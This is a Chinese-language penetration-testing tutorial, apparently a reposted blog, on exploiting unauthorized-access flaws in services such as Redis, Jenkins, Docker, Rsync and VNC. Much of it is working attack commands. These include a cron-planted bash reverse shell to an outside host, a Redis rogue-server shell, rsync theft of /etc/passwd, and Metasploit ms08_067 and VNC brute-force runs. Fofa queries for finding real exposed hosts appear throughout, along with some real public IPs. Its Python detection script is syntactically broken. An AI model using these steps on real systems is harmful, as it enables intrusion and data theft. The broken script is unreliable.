【未授权访问漏洞复现~~~】

news2024/9/20 20:37:59
一: Redis未授权访问漏洞

步骤一:进入vulhub目录使用以下命令启动靶机…

进入目录:cd /vulhub-master/redis/4-unacc
启动:docker-compose up-d
检查:docker-compose ps

步骤二:在Kali上安装redis程序进行服务的链接.

#安装redis
apt-get install redis
#redis链接
redis-cli -h 192.168.4.176 -p 6379
#redis常见命令
 (1)查看信息:info
 (2)删除所有数据库内容:flushall
 (3)刷新数据库:flushdb
 (4)看所有键:KEYS *,使用select num可以查看键值数据。
 (5)设置变量:set test“whoami"
 (6)config set dir dirpath 设置路径等配置
 (7)config get dir/dbfilename 获取路径及数据配置信息
 (8)save保存
 (9)get 变量,查看变量名称

image-20240805203016935

步骤三:可以直接连接执行命令且不需要认证说明存在未授权访问漏洞…下载以下攻击项目…

https://github.com/n0b0dyCN/redis-rogue-server

步骤四:使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境

python3 redis-rogue-server.py --rhost 192.168.4.176 --lhost 192.168.4.108

image-20240805204745397

二: MongoDB未授权访问漏洞

步骤一:在Kali上执行以下命令搭建起MongoDB的漏洞环境…

拉取镜像:docker pull mongo
启动容器:docker run -d -p 27017:27017 --name mongodb mongo
查看容器:docker ps -a

步骤二:使用Nmap的插件脚本进行扫描…发现存在未授权访问漏洞.

# 扫描命令
nmap -p 27017 --script mongodb-info 192.168.4.176

image-20240805205215476

步骤三:也可尝试使用MSF中的模块进行漏洞测试…不需要认证即可直接连接

use auxiliary/scanner/mongodb/mongodb_login
show options
set rhosts 192.168.4.128
set threads 15
exploit

image-20240805205741295

步骤四:即存在未授权访问漏洞使用Navicat进行连接

image-20240805205914845

三: Memcached未授权访问漏洞

步骤一:下载Memcached程序并执行以下命令…启动Memcached漏洞环境

#emcached程序下载
https://www.121down.com/soft/softview-28366.html
https://www.runoob.com/memcached/window-install-memcached.htm
#执行命令
memcached.exe -d install
memcached.exe -d start

步骤二:使用TeInet程序探测目标的11211端口.

#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容,造成敏感信息泄露

image-20240805210826638

步骤三:使用Nmap程序的脚本进行漏洞扫描

nmap -p11211 --script memcached-info 192.168.4.199

image-20240805210630672

步骤四:漏洞探测脚本(参考)

#!/usr/bin/env python
#_*_ coding:utf_8_*
def Memcache_check(ip, port=11211,timeout=5):
    try:
        socket.setdefaulttimeout(timeout)
        s=socket.socket(socket.AF INET,socket.SOCK STREAM)
        s.connect((ip,int(port)))
        s.send("stats\r\n" )
        result =s.recv(1024)
        if "STAT version" in result:
            print '[+]Memcache Unauthorized:'+ip+':'+str(port)
        except Exception,e:
            pass
if__name__=='__main__':
    Elasticsearch check("127.0.0.1")
四: Zookeeper未授权访问漏洞

步骤一:使用以下Fofa语法搜索资产信息.
port="2181"
步骤二:在Kali中使用以下命令进行未授权访问漏洞测试,

echo envi | nc ip port

my:
3.5.192.161 2181

image-20240805202312471

步骤三:可使用Zookeeper可视化管理工具进行连接…

#工具下载
https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

image-20240805202602945

五: Jenkins未授权访问漏洞

步骤一:使用以下fofa语法进行产品搜索.

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中…点击 Manage Jenkins–>ScritpConsole 在执行以下命令

#执行命令
println "whoami" .execute().text
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

image-20240805200952439

image-20240805201241792

六: Jupyter NoteBook未授权访问漏洞

步骤一:通过以下fofa语法进行产品搜索…或使用vulhub启动靶场…

#fofa语法
"Jupyter Notebook" && port="8888"
#vulhub靶场
cd /vulhub/jupyter/notebook-rce
docker-compose up -d

步骤二:如果存在未授权访问漏洞则直接访问 http://IP:8888会直接跳到web管理界面,不需要输入密码。
image-20240805113058732

步骤三:从New->Terminal 新建一个终端,通过新建的终端可执行任意命令

#命令执行页面
http://ip/terminals/1

image-20240805113158346

七、Elasticsearch未授权访问漏洞

步骤一:使用以下Fofa语法进行Elasticsearch产品搜索:
"Elasticsearch" && port="9200"
步骤二:存在未授权访问则直接进入到信息页面…不需要输入用户密码登陆.

#目标地址

#访问测试
http://localhost:9200/_plugin/head/web管理界面
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search 查看数据库敏感信息
http://localhost:9200/_nodes查看节点数据

image-20240805095843893

步骤三:可按照上面查看节点信息等、

image-20240805095912359

八、Kibana未授权访问漏洞

步骤一:使用以下Fofa语句搜索Kibana产品…并打开页面…
"kibana" && port="5601"
步骤二:直接访问Kibana的页面且无需账号密码可以登陆进入界面.

#拼接路径
HTTP://{IP}/app/kibana#/
#eg

my:
http://ip:5601/app/kibana#/

http://ip:5601/app/home#/
http://ip:5601/app/kibana_overview#/

image-20240805101148181

image-20240805101449384

九、Docker Remote APl未授权访问漏洞*

步骤一:使用以下Fofa语句对Docker产品进行搜索…
port="2375"
步骤二:直接使用浏览器访问以下路径…

http://ip:2375/version #查看版本信息
http://ip:2375/info #查看容器信息

image-20240805111603262

步骤三:使用-H参数连接目标主机的docker,使用ps命令查询目标系统运行的镜像。

docker -H tcp://ip:2375 ps
docker -H tcp://ip:2375 version
docker -H tcp://ip:2375 exec -it 1f4 /bin/bash
操作思路:
	docker pull 下载有Docker逃逸的容器下来d
	ocker逃逸间接获取安装docker主机控制权限

image-20240805112343197

十、Kubernetes Api Server未授权访问漏洞

步骤一:使用以下Fofa语法搜索Kubernetes产品…
port="8080" && app="Kubernetes"

步骤二:在打开的网页中直接访问 8080 端口会返回可用的 API列表…

image-20240805094633046

十一:Hadoop未授权访问漏洞

步骤一:使用以下FOFA语法进行Hadoop产品的搜索…

port="8088" && app="Hadoop"

步骤二:开启页面直接访问不经过用户密码验证…

http://ip:8088/cluster

image-20240805104523382

十二:ActiveMQ未授权访问漏洞

步骤一:使用以下Fofa语法搜索产品…

body="ActiveMQ" && port="8161"

步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin,在打开的页面输入…

http://ip:8161/
http://ip/admin/

第一种

image-20240805105152051

image-20240805105057779

第二种

image-20240805104745887

image-20240805104830399

十三:RabbitMQ未授权访问漏洞

步骤一:使用以下Fofa语法对RabbitMQ产品进行搜索…

port="15672"
port="15692"
port="25672"

步骤二:在打开的页面中可输入默认的账号和密码进行登陆

默认账号密码都是guest
http://ip15672/
http://ip:15672/

image-20240805105734307

十四:Springboot Actuator未授权访问漏洞

Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块。其提供的执行器端点分为两类:原生端点和用户自定义扩展端点,原生端点主要有:

/dump -显示线程转储(包括堆栈跟踪)
/autoconfig -显示自动配置报告
/configprops-显示配置属性
/trace -显示最后几条HTTP消息(可能包含会话标识符)
/logfile - 输出日志文件的内容
/shutdown -关闭应用程序
/info - 显示应用信息
/metrics -显示当前应用的'指标"信息
/health - 显示应用程序的健康指标
/beans-显示Spring Beans的完整列表
/mappings-显示所有MVC控制器映射
/env - 提供对配置环境的访问
/restart-重新启动应用程序

步骤一:使用以下Fofa语句搜索资产并打开页面访问.

icon_hash="116323821"

步骤二:当 web 应用程序出现 4xx、5xx 错误时显示类似以下页面就能确定当前 web 应用是使用了springboot 框架…

http://ip/

image-20240805110930700

步骤三:拼接以下路径查看泄露的数据

访问/trace端点获取基本的 HTTP 请求跟踪信息(时间戳、HTTP 头等),如果存在登录用户的操作请求,可以伪造cookie进行登录。
访问/env端点获取全部环境属性,由于 actuator 会监控站点 mysql、mangodb 之类的数据库服务,所以通过监控信息有时可以mysql、mangodb 数据库信息,如果数据库正好开放在公网,那么造成的危害是巨大的。
git 项目地址泄露,这个一般是在/health 路径,比如如下站点,访问其 health 路径可探测到站点 git 项目地址。
my:
https://ip/

image-20240805110712888

十五:FTP未授权访问漏洞(匿名登陆)

步骤一:对目标环境在资源管理器中用以下格式访问…如果该服务器开启了匿名登陆,则可直接进行内容查看…

ftp://ip:port/

image-20240805114930610

image-20240805115618994

十六:JBoss未授权访问漏洞

步骤一:使用以下语法搜索Jboss产品并打开其页面.

title="Welcome to JBoss"

步骤二:拼接以下路径且无需认证直接进入控制页面.

#拼接路径
http://ip:port/jmx-console/

image-20240805153724576

image-20240805153543627

步骤三:后续可以利用 jboss.deployment 部署shell

十七:Ldap未授权访问漏洞

步骤一:使用以下Fofa语法搜索使用Idap服务的产品.….并通过Ldapadmin可视化工具做连接验证…

#Fofa语法
port="389"
http://www.ldapadmin.org/download/index.html
https://sourceforge.net/projects/ldapadmin/

步骤二:启动工具并测试存在未授权的LDAP服务…成功如下.
在这里插入图片描述

步骤三:连接目标LDAP服务并查看其内容

image-20240805160527541

十八:Rsync未授权访问漏洞

步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!!!

# Fofa语法
(port="873") && (is_honeypot=false && is_fraud=false)
# 启动靶场
cd vulhub/rsync/common
docker-compose up-d

步骤二:可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测…

# nmap命令
nmap -p 873 --script rsync-list-modules ipaddress
# Metasploit模块
auxiliary/scanner/rsync/modules list

image-20240805184739996

步骤三:使用命令进行链接并读取文件

执行命令#
rsync rsync://192.168.124.153:873/
rsync rsync://192.168.124.153:873/src/

image-20240805184840015

步骤四:对系统中的敏感文件下载操作…/etc/passwd

# 执行命令
命令格式:rsync rsync://IP:port/src/etc/passwd 目标路径
例如:rsync rsync://192.168.124.153:873/src/etc/passwd /tmp/tmp/
# 结果查看
root@kali:/# cat /tmp/tmp/passwd

image-20240805184921581

步骤五:上传文件…如果有相应的jsp/asp/php环境可以写一句话以phpinfo为例.

#攻击机操作
root@kali:/# echo "<?php phpinfo();?>" > phpinfo.php
root@kali:/# cat ./phpinfo.php
root@kali:/# rsync ./phpinfo.php rsync://192.168.124.153:873/src/home

# 靶机操作
root@4448da0725bd:/#ls
root@4448da0725bd:/# cd home/
root@4448da0725bd:/home#ls
phpinfo.php
root@4448da0725bd:/home# cat phpinfo.php

image-20240805185004953

image-20240805185047236

步骤六:反弹shell…在此可利用定时任务cron来反弹获取shell

# 1.查看定时任务
root@kali:/# rsync rsync://192.168.124.153:873/src/etc/crontab

# 2.将定时任务文件下载下来
rsync rsync://192.168.124.153/src/etc/crontab /tmp/tmp/crontab.txt

# 3.定时任务内容为,大致意思为每17分钟调用一次/etc/cron.hourly

# 4.创建shell文件
#!/bin/bash
/bin/bash i>& /dev/tcp/10.10.10.128/4444 0>&1

chmod 777 shell

#6.上传shell至靶机
root@kali:/#rsync -av /tmp/tmp/shell rsync://192.168.124.153:873/src/etc/cron.hourly

# 7.攻击机开启nc监听相应端口
nc -lvp 4444

image-20240805191603563

十九:VNC未授权访问漏洞

步骤一:使用以下语句在Fofa上进行资产收集…

(port="5900") && (is_honeypot=false && is_fraud=false)

步骤二:可通过MSF中的模块进行检测与漏洞利用.

# VNC未授权检测
msf6>use auxiliary/scanner/vnc/vnc none_auth
msf6 auxiliary(scanner/vnc/vnc none_auth)>show options
msf6 auxiliary(scanner/vnc/vnc none_auth)>set rhosts 192.168.168.200-254
msf6 auxiliary(scanner/vnc/vnc none_auth)>set threads 100
msf6 auxiliary(scanner/vnc/vnc none_auth)>run

# VNC密码爆破
msf6>use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc login)>192.168.168.228
msf6 auxiliary(scanner/vnc/vnc login)>set rhosts 192.168.168.228
msf6 auxiliary(scanner/vnc/vnc login)>set blank_passwords true /密码爆破
msf6 auxiliary(scanner/vnc/vnc login)>run

# 加载攻击模块
msf6 exploit(windows/smb/ms08 067_netapi)>use exploit/windows/smb/ms08_067_netapi
msf6 exploit(windows/smb/ms08 067_netapi)>set payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08 067 netapi)>set rhosts 192.168.168.228
msf6 exploit(windows/smb/ms08 067 netapi)>set lhost 192.168.168.102
msf6 exploit(windows/smb/ms08 067 netapi)>set target 34
msf6 exploit(windows/smb/ms08 067 netapi)>exploit
获取会话后,直接run vnc可控制远程虚拟机

# 直接控制远程机器
msf6 >use exploit/multi/handler
msf6 exploit(multi/handler)>set payload windows/vncinject/reverse_tcp
msf6 exploit(multi/handler)>set lhost 192.168.168.102
msf6 exploit(multi/handler)>set lport 4466
msf6 exploit(multi/handler)>exploit

步骤三:VNC链接验证…

vncviewer ipaddress
二十:Dubbo未授权访问漏洞

步骤一:使用以下语句在Fofa上进行资产收集.

(app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

步骤二:使用TeInet程序直接进行链接测试…

telnet IP port

image-20240805152925428

二十一:NSF共享目录未授权访问

步骤一:使用以下语句在Fofa上进行资产收集.

"nfs"

步骤二:执行命令进行漏洞复现….

#安装nfs客户端
apt install nfs-common

#查看nfs服务器上的共享目录
showmount -e ip

#挂载相应共享目录到本地
mount -t nfs ip:/grdata /mnt

#卸载目录
umount /mnt

image-20240805193836739

二十二:Druid未授权访问漏洞

步骤一:使用以下语句在Fofa与Google上进行资产收集.

# Fofa
title="Druid Stat Index"

#PHPINFO页面
inurl:phpinfo.php intitle:phpinfo()info.php test.php

# Druid未授权访问
inurl:"druid/index.html" intitle:"Druid Stat Index'

步骤二:对访问到的站点查看…

http://ip:8010/druid/websession.html
http://ip:8088/pos/druid/websession.html

image-20240805194553851

步骤三:Druid批量扫描脚本…

https://github.com/MzzdTOT/CVE-2021-34045
二十三:CouchDB未授权访问

步骤一:使用以下语句在Fofa上进行资产收集…或开启Vulhub靶场进行操作…

# 搜索语法
(port="5984") && (is_honeypot=false && is_fraud=false)

# Vulhub靶场
cd /vulhub/couchdb/CVE-2017-12636
docker-compose up -d

步骤二:执行未授权访问测试命令

curl 192.168.1.4:5984 
curl 192.168.1.4:5984/_config

image-20240805195846564

步骤三:反弹Shell参考…

https://blog.csdnnet/qq_45746681/article/details/108933389
二十四:Altassian Crowd未授权访问漏洞

(等待更新)

二十五:RTSP未授权访问漏洞
VLC media player,单击“媒体”选项,选择“打开网络串流”。
在弹出的窗口中输入网络URL:
rtsp://admin:888888@192.168.1.1:554/cam/realmonitor?channel=2&subtype=1
username:用户名。例如admin。
  password:密码。例如admin。
  ip:为设备IP。例如 192.168.1.1.
  port:端口号默认为554,若为默认可不填写。
  channel:通道号,起始为1。例如通道2,则为channel=2
  subtype:码流类型,主码流为0(即subtype=0),辅码流为1(即subtype=1)

步骤一:使用以下语句在Fofa上进行资产收集.

(port=“554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp'

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1983134.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Linux进程篇】并发艺术:Linux条件变量与生产消费者模型的完美融合

W...Y的主页 &#x1f60a; 代码仓库分享&#x1f495; 前言&#xff1a;我们上篇博客中提到了线程互斥、引出了互斥锁解决了线程中的未将临界资源保护的问题。但是随之出来的问题——竞争锁是自由竞争的&#xff0c;竞争锁的能力太强的线程会导致其他线程抢不到票&#xff0…

Linux——线程互斥与同步

一、线程互斥 1.1 线程间互斥的概念 在学习管道的时候&#xff0c;管道是自带同步与互斥的。而在线程中&#xff0c;当多个线程没有加锁的情况下同时访问临界资源时会发生混乱。在举例之前&#xff0c;先了解几个概念。 临界资源&#xff1a;多个线程执行流共享的资源叫做临…

软甲测试定义和分类

软件测试定义 使用人工和自动手段来运行或测试某个系统的过程&#xff0c;其目的在于检验他是否满足规定的需求或弄清预期结果与实际结果之间的差别 软件测试目的 为了发现程序存在的代码或业务逻辑错误 – 第一优先级发现错误为了检验产品是否符合用户需求 – 跟用户要求实…

WPF学习(3)- WrapPanel控件(瀑布流布局)+DockPanel控件(停靠布局)

WrapPanel控件&#xff08;瀑布流布局&#xff09; WrapPanel控件表示将其子控件从左到右的顺序排列&#xff0c;如果第一行显示不了&#xff0c;则自动换至第二行&#xff0c;继续显示剩余的子控件。我们来看看它的结构定义&#xff1a; public class WrapPanel : Panel {pub…

【网页设计】基于HTML+CSS上海旅游网站网页作业制作

一、&#x1f468;‍&#x1f393;网站题目 旅游&#xff0c;当地特色&#xff0c;历史文化&#xff0c;特色小吃等网站的设计与制作。 二、✍️网站描述 &#x1f468;‍&#x1f393;静态网站的编写主要是用HTML DIVCSS 等来完成页面的排版设计&#x1f469;‍&#x1f39…

CSP初赛知识点讲解(一)

CSP初赛知识点讲解&#xff08;一&#xff09; 信息学竞赛哈夫曼树 哈夫曼编码冯.诺依曼理论计算机奖项例题训练&#xff08;一&#xff09;操作系统例题训练&#xff08;二&#xff09;计算机语言例题训练&#xff08;三&#xff09; 信息学竞赛 全国青少年计算机程序设计竞赛…

VINS-Fusion 多传感器全局位姿估计的一种通用优化框架

摘要 对于自动导航的机器人来说,精确的状态估计是基本问题。为了实现局部精确和全局无漂移的位姿估计,通常将具有互补属性的多个传感器进行融合。在一个小的区域内,局部传感器,如相机、IMU、Lidar等,提供了精确的位姿,而在一个大场景环境下,全局传感器,如gps、magneto…

java 变量及其常量

变量 数据类型关键字内存占用取值范围字节型byte1个字节-128 至 127 定义byte变量时超出范围,废了短整型short2个字节-32768 至 32767整型int&#xff08;默认&#xff09;4个字节-231 至 231-1 正负21个亿-2147483648——2147483647长整型long8个字节-263 至 263-1 19位数字-9…

【51单片机DS1302时钟芯片读取数码管显示打造小成本高品质】2022-12-23

缘由https://ask.csdn.net/questions/7867303 /*写回复缘由https://ask.csdn.net/questions/7867303*/ #include "reg52.h" sbit RSTP3^5;//DS1302允许(读/写)当RST为高电平时&#xff0c;所有的数据传送被初始化&#xff0c;允许对DS1302进行操作。如果在传送过程中…

不用PS也能抠图?点哪抠哪,简直是职场人的最强助手

抠图你还在用 PS 一点点抠吗&#xff1f; 不仅费时费力&#xff0c;还常常达不到理想效果&#xff0c;真的太让人崩溃了 但别担心&#xff0c;我找到了一个超棒的工具——千鹿设计助手的AI智能抠图插件。它就像你的私人设计小助手&#xff0c;能快速帮你把想要的元素抠出来&…

Mendix 创客访谈录|Mendix 如何化解工业企业数字化转型的复杂性

本期创客 田月萍 西门子 Advanta研发部门 大家好&#xff0c;我是田月萍&#xff0c;来自西门子Advanta的研发部门&#xff0c;专注于工业数字化转型。在我的职业生涯中&#xff0c;参与了多个关键项目的开发&#xff0c;涵盖了制造执行系统&#xff08;MES&#xff09;的实施&…

ECMA6Script学习笔记(六)

【摘要】 本文是对自己学习ES6的学习笔记回顾,后面是概要:文章深入探讨了ES6模块化处理&#xff0c;强调模块化在提高代码可维护性、可复用性和可扩展性方面的重要性。介绍了ES6模块化的三种导出方式&#xff1a;分别导出、统一导出和默认导出&#xff0c;并通过具体的代码示例…

3.特征工程-特征抽取、特征预处理、特征降维

文章目录 环境配置&#xff08;必看&#xff09;头文件引用1.数据集: sklearn代码运行结果 2.字典特征抽取: DictVectorizer代码运行结果稀疏矩阵 3.文本特征抽取(英文文本): CountVectorizer()代码运行结果 4.中文文本分词(中文文本特征抽取使用)代码运行结果 5.中文文本特征抽…

一款功能强大且免费的Windows系统优化工具

TweakPower是一款功能强大的Windows系统优化工具&#xff0c;旨在帮助用户提升电脑性能、清理垃圾文件、备份数据以及修复系统问题。该软件提供了多种实用功能&#xff0c;包括内存管理、垃圾清理、数据备份、数据擦除、硬盘维护和性能调度调整等。 TweakPower的主要界面或仪表…

如意玲珑支持发行版再添新成员,openEuler安装使用如意玲珑操作指南

查看原文 如意玲珑&#xff08;Linyaps&#xff09;项目已与开放原子开源基金会完成捐赠协议签署&#xff0c;目前如意玲珑已成为基金会的正式孵化期项目。 如意玲珑是开源软件包格式&#xff0c;用于替代 deb、rpm等包管理工具&#xff0c;实现应用包管理、分发、容器、集成开…

数据产品价值评估体系搭建

00前言 随着数据在企业的重要性越来越高&#xff0c;数据赋予的价值和意义在企业内部也深入人心&#xff0c;不仅纳入到了企业战略中去&#xff0c;在日常的工作中&#xff0c;各个业务部门也会不断的提出五花八门的数据需求&#xff08;数据分析、数据治理、数据应用等等&…

qt-01安装

qt5.15安装 版本链接5.15Qt5.15.2镜像QTCreater Launching Debugger 错误 版本链接5.15 https://download.qt.io/archive/online_installers/4.5/ Qt5.15.2镜像 https://mirrors.tuna.tsinghua.edu.cn/qt/online/qtsdkrepository/windows_x86/desktop/qt5_5152/ https://m…

插入数据优化 ---大批量数据插入建议使用load

一.insert优化 1.批量插入 2.手动提交事务 3.主键顺序插入 二.大批量插入数据 如果一次性需要插入大批量数据,使用insert语句插入性能较低,此时可以使用MySQL数据库提供的load指令进行插入。操作如下 1.客户端连接服务端时,加入参数 --local-infine mysql --local-infine…

AllReduce通信库;Reduce+LayerNorm+Broadcast 算子;LayerNorm(层归一化)和Broadcast(广播)操作;

目录 AllReduce通信库 一、定义与作用 二、常见AllReduce通信库 三、AllReduce通信算法 四、总结 Reduce+LayerNorm+Broadcast 算子 1. Reduce 算子 2. LayerNorm 算子 3. Broadcast 算子 组合作用 LayerNorm(层归一化)和Broadcast(广播)操作 提出的创新方案解析 优点与潜在…

私有化部署 Dify+Ollama并使用qwen2快速搭建 AI 应用

私有化部署 DifyOllama并使用qwen2快速搭建 AI 应用 Dify 是一款开源的大语言模型(LLM) 应用开发平台。它融合了后端即服务&#xff08;Backend as Service&#xff09;和 LLMOps 的理念&#xff0c;使开发者可以快速搭建生产级的生成式 AI 应用。即使你是非技术人员&#xff…